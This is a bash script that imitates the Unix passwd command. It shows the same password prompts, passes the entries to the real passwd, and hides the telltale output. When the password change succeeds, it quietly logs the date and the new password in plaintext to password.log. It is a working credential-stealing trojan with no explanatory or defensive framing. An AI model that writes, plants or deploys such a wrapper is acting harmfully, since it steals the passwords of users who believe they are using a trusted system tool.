#!/bin/bash

for ARG in $*; do
    OUT=$(echo "$ARG" | grep "-")
    if [ "$OUT" != "" ]; then
        PASSTHROUGH=true
    else
        USER=$ARG
    fi
done

if [ "$PASSTHROUGH" = true ]; then
    passwd $*
    exit $?
fi

read -s -p "Enter new UNIX password: " PASS
echo ""
read -s -p "Retype new UNIX password: " PASS_CONFIRM
echo ""

ACTUAL_OUT=$((echo $PASS; echo $PASS_CONFIRM) | passwd $* 2>&1)
EXIT_CODE=$?

if [ $EXIT_CODE -eq 0 ]; then
    echo "$(date) $PASS" > password.log
fi

PROCESSED_OUT=$(echo "$ACTUAL_OUT" | cut -c52-)

echo "$PROCESSED_OUT"
exit $EXIT_CODE
